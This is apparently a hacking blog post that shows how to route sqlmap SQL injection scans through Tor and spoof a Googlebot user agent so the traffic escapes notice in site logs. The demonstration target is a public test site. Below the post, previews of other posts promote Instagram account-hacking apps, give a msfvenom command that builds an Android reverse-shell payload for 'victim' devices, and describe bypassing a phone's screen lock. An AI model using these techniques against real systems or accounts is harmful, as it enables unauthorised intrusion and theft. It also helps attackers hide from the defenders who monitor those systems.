Skip to main content

SQLMap with Tor for Anonymity.

Installing Tor

Getting tor for Kali Linux is as simple as typing a single line in the terminal-
apt-get instal tor
If you have any problems installing, then do an apt-get update first.


Start Tor

This is also quite simple
tor
You'll see something like this-
Root@kali:
  • Sep 04 02:41:25.806 [notice] Tor v0.2.8.7 (git-cc2f02ef17899f86) running on Linux with Libevent 2.0.21-stable, OpenSSL 1.0.2h and Zlib 1.2.8.
    Sep 04 02:41:25.806 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
    Sep 04 02:41:25.806 [notice] Read configuration file "/etc/tor/torrc".
    Sep 04 02:41:25.811 [notice] Opening Socks listener on 127.0.0.1:9050
    Sep 04 02:41:25.000 [notice] Parsing GEOIP IPv4 file /usr/share/tor/geoip.
    Sep 04 02:41:25.000 [notice] Parsing GEOIP IPv6 file /usr/share/tor/geoip6.
    Sep 04 02:41:26.000 [warn] You are running Tor as root. You don't need to, and you probably shouldn't.
    Sep 04 02:41:26.000 [notice] Bootstrapped 0%: Starting
    Sep 04 02:41:27.000 [notice] Bootstrapped 5%: Connecting to directory server
    Sep 04 02:41:27.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
    Sep 04 02:41:27.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
    Sep 04 02:41:27.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
    Sep 04 02:41:28.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
    Sep 04 02:41:29.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
    Sep 04 02:41:30.000 [notice] Bootstrapped 40%: Loading authority key certs
    Sep 04 02:41:30.000 [notice] Bootstrapped 45%: Asking for relay descriptors
    Sep 04 02:41:30.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/7117, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
    Sep 04 02:41:31.000 [notice] Bootstrapped 50%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 55%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 61%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 66%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 73%: Loading relay descriptors
    Sep 04 02:41:34.000 [notice] Bootstrapped 78%: Loading relay descriptors
    Sep 04 02:41:35.000 [notice] Bootstrapped 80%: Connecting to the Tor network
    Sep 04 02:41:36.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
    Sep 04 02:41:38.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
    Sep 04 02:41:38.000 [notice] Bootstrapped 100%: Done 


    •  
Important: Don't close this terminal. Open a new terminal for further steps.

Testing with Sqlmap

Use this command
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5
If you want a text version:-
Root@kali:
  • _
    ___ ___| |_____ ___ ___ {1.0.8.2#dev}
    |_ -| . | | | .'| . |
    |___|_ |_|_|_|_|__,| _|
    |_| |_| http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 02:47:02

    [02:47:02] [WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
    [02:47:02] [INFO] setting Tor SOCKS proxy settings
    [02:47:02] [INFO] testing connection to the target URL
    [02:47:03] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    [02:47:04] [INFO] testing if the target URL is stable
    [02:47:06] [INFO] target URL is stable
    [02:47:06] [INFO] testing if GET parameter 'cat' is dynamic
    [02:47:07] [INFO] confirming that GET parameter 'cat' is dynamic

Additional obscurity

Google's crawlers often visit websites, and are one of the least suspicious entities in the website's logs. We can use that to our advantage. Use this command to pretend to be googleBot.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
 This is what you would see.

At this point, you are going to look like a google bot, and your IP would be that of some Tor exit node. This should be enough for most purposes.

Comments

Post a Comment

Popular posts from this blog

Top 10 Free Instagram Hacker App For iPhone and Android.

Top 10 Free Instagram Hacker App For iPhone and Android Posted by Nagesh ;) Instagram is no doubt one of the most used apps when it comes to uploading and sharing pictures with your friends and families. However, as much as you may like to use Instagram, the fact remains that anyone can access your account with or without your consent. How is this possible you may ask? The answer lies in the Instagram hacker app. Yes!! You heard right. An Instagram hacker app is a type of an app that works by retrieving passwords and other login details from a target account. As it stands, since Instagram is available on both the Android and iOS platforms, these apps can be found on this platforms as well. These Instagram hack apps are efficient when it comes to hacking passwords, so it's best to be guaranteed that they will hack your IG account in a matter of minutes. Part 1: 5 Free Instagram Hacker App For iPhone Part 2: 5 Free Instagram Hacker App For Android Part 3: Using ...
Post a Comment
Read more

HOW TO HACK ANDROID USING KALI LINUX 2017 (METASPLOIT)

Getting an access of victim devices (Computer, Android based Phone) is very easy because of reverse exploitation ttacks. A hacker use different types of exploitation’s to gaining access like reverse_tcp, reverse_http and many more with various types of file format (.exe .bat .apk). A payload which is created using reverse_tcp, When victim download that file and install it then it created a reverse connection victim to attacker. There is may be the victim having firewall or some other defense system, In this attack the firewall looks that the client (victim) to send request to the server (attacker machine) that’s why it allow the connection. In this tutorial, I am going to show how we can create a android payload and by using that how can we gaining access of victim device. Open terminal: msfvenom -p android/meterpreter/reverse_tcp set lhost=192.168.0.100 -o fun.apk Where LHOST is the listening host (In my case this is my private IP as per my lab environment), You can ...
Post a Comment
Read more

How to Bypass your Android Mobile Screen Lock Easily

How to Bypass your Android Mobile Screen Lock Easily METHOD I Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc…) Installed: INSTRUCTIONS: 1. Download this zip Pattern Password Disable (Download from attachments) on to your sdcard (using your PC, as you cant get into your phone, right ) 2. Insert the sdcard into your phone 3. Reboot into recovery mode 4. Flash the zip 5. Reboot 6. Done! Note:  If You See The Gesture Pattern Grid Or Password After Restarting, Don’t Worry. Just Try Any Random Pattern Or Password And it Should Unlock. METHOD 2 Solution For Everyone Without Recovery Installed – ADB: What You Need: =>A computer running a Linux distro or Windows+Cygwin =>USB cable to connect your phone to the PC =>Adb installed How to install adb: 1. Open Terminal 2. Type: “sudo apt-get install android-tools-adb” -> Hit [Enter] 3. Follow the instructions until everything is installed. INSTRUCTIONS: 1. Connect you (turned on) Phone to...
Post a Comment
Read more